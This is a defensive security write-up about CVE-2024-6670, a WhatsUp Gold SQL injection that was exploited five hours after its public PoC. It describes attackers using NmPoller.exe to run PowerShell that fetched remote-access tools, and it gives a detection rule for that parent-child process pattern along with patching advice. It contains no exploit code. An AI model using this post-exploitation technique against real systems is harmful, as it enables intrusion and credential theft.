Five hours from public PoC to live exploitation on your monitoring server
CVE-2024-6670 is an unauthenticated SQL injection in WhatsUp Gold. The exploit went public at 5pm UTC; Trend Micro saw the first real attack by 10pm. The tool that watches your whole network became the way in.
Here’s the timeline that should change how you schedule patches for infrastructure software. On August 30, 2024, at 5pm UTC, the researcher who found CVE-2024-6670 published a proof-of-concept exploit on GitHub. By 10pm UTC the same day, Trend Micro’s managed-detection team observed the first real-world attack abusing it. Five hours from public exploit code to live exploitation in a customer environment. The patch had been available for two weeks. It didn’t matter, because two weeks is slower than five hours.
The target was WhatsUp Gold, Progress Software’s network monitoring platform. That product choice is not incidental. Monitoring servers are built to reach everything, hold credentials to half your infrastructure, and run trusted background processes. When the thing that watches the network is the thing that gets popped, the attacker inherits the vantage point you built for your own operations team.
What the bug is
CVE-2024-6670 is an unauthenticated SQL injection (CWE-89), CVSS 9.8. Progress patched it in the August 2024 bulletin, with the fix landing in WhatsUp Gold 2024.0.0. The specific impact, as worded in the CISA KEV entry, is narrow on paper and brutal in practice: when the application is configured with a single user, which is an extremely common deployment, an unauthenticated attacker can use the injection to retrieve that user’s encrypted password. Recover the admin credential and you don’t need an RCE bug; you just log in to the monitoring console that already has reach across the estate. CVE-2024-6671 is the sibling SQLi from the same bulletin. The discoverer, Sina Kheirkhah of Summoning Team, published the analysis and PoC together.
What the attackers did next is the part worth studying. Rather than carry their own malware in, they abused NmPoller.exe, a legitimate WhatsUp Gold component, as a script host: the poller was used to execute PowerShell that downloaded a spread of remote-access tools, including Atera Agent, Radmin, SimpleHelp, and Splashtop. That’s living-off-the-land using the monitoring product’s own trusted binary, then establishing persistence through commodity RMM software that blends into a managed environment. CISA flagged the entry for known ransomware-campaign use, and the remediation deadline was October 7, 2024.
This wasn’t WhatsUp Gold’s only 2024 critical
CVE-2024-6670 didn’t arrive in a vacuum. Two months earlier, Progress patched CVE-2024-4885, an unauthenticated remote code execution flaw, also CVSS 9.8, in the WhatsUp.ExportUtilities.Export.GetFileWithoutZip handler. A path traversal (CWE-22) there allowed command execution with iisapppool\nmconsole privileges, fixed in version 2023.1.3. At disclosure there was no public evidence of exploitation, but CISA added it to the KEV catalog on March 3, 2025, which means exploitation evidence eventually arrived. So inside roughly a year, the same monitoring product produced multiple unauthenticated 9.8 bugs, each reachable by anyone who could see the web interface, and both ended up on the exploited-in-the-wild list.
That’s the pattern that should drive the prioritization, not any single CVE. A product with a string of pre-authentication criticals in management-plane functionality is telling you something about its exposure, and the operational answer is the same regardless of which specific bug is in the news: this thing should not be reachable from anywhere it doesn’t have to be.
What to do
- Get current and stay current. WhatsUp Gold needs to be on 2024.0.0 or later to close CVE-2024-6670 and 6671, and on at least 2023.1.3 to close CVE-2024-4885; the latest release rolls all of these up. Given the cadence of criticals in this product, treat its patches as out-of-band-eligible, not quarterly-window material.
- Take it off the public internet. There is no good reason for a network monitoring console to answer to the open web. Put the management interface behind VPN or IP allowlisting. The five-hour exploitation window only burns you if the attacker can reach the interface; restrict that reach and the PoC-to-exploit race stops being your problem.
- Hunt for
NmPoller.exedoing things a poller shouldn’t. A monitoring poller spawning PowerShell, or initiating outbound downloads, is anomalous. Alert onNmPoller.exeas a parent process forpowershell.exe,cmd.exe, or script interpreters. That single detection would have caught this campaign’s post-exploitation step. - Inventory the RMM tools in your environment. Atera, Radmin, SimpleHelp, and Splashtop are all legitimate products, which is exactly why attackers reach for them. If one appears on a server that your team didn’t deploy, that’s a finding, not a footnote. Maintain an allowlist of sanctioned remote-access tools so the unsanctioned ones stand out.
- Rotate the monitoring credentials if you were exposed before patching. The whole point of the SQLi was credential theft. If you ran an unpatched, internet-reachable instance, assume the admin credential leaked and rotate it, along with any infrastructure credentials that account could reach.
The reframe is about clocks. Patch-management programs are still largely built around the idea that you have a window, a few weeks between a fix shipping and exploitation becoming widespread, to test and deploy on your own schedule. For internet-reachable infrastructure software with a public PoC, that window has collapsed to hours. CVE-2024-6670 is the proof: the defenders who patched in those first two weeks were fine, and everyone planning to get to it “next maintenance cycle” was racing a clock that had already run out. We flag this class of bug, pre-auth criticals in infrastructure you expose, the day it lands, because for these the gap between the advisory and the attack is now measured in hours.
Sources
- CISA Known Exploited Vulnerabilities Catalog
- NVD CVE-2024-6670 — 2024-08-29
- NVD CVE-2024-4885 — 2024-06-25
- Progress WhatsUp Gold Security Bulletin, August 2024 — 2024-08-16
- Trend Micro: Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities — 2024-09
- SecurityWeek: Recent WhatsUp Gold vulnerabilities possibly exploited in ransomware attacks — 2024-09
Share
Related field notes
-
A soft hyphen reopened a bug PHP closed in 2012
CVE-2024-4577 is a patch bypass of a 12-year-old PHP-CGI flaw. The 2012 fix sanitized the input. Windows then helpfully rewrote a soft hyphen back into a real one, after the check, and handed the attacker their command-line argument anyway.
-
SAP NetWeaver was owned for ten weeks before anyone said anything
Five threat groups were already inside SAP NetWeaver when the emergency patch shipped. One confirmed victim reported multi-billion dollar profit impact. SAP's initial workaround guidance was later marked 'Do Not Use.'
-
BeyondTrust RS/PRA hit again. Same endpoint, same bug class, 15 months later.
The researcher who found CVE-2026-1731 did it by asking one question about the December 2024 fix: did the same pattern exist elsewhere? It did. Third critical BeyondTrust RCE in 15 months, confirmed ransomware, CISA gave you 3 days.
One email, every weekday morning.
You're in. Check your inbox.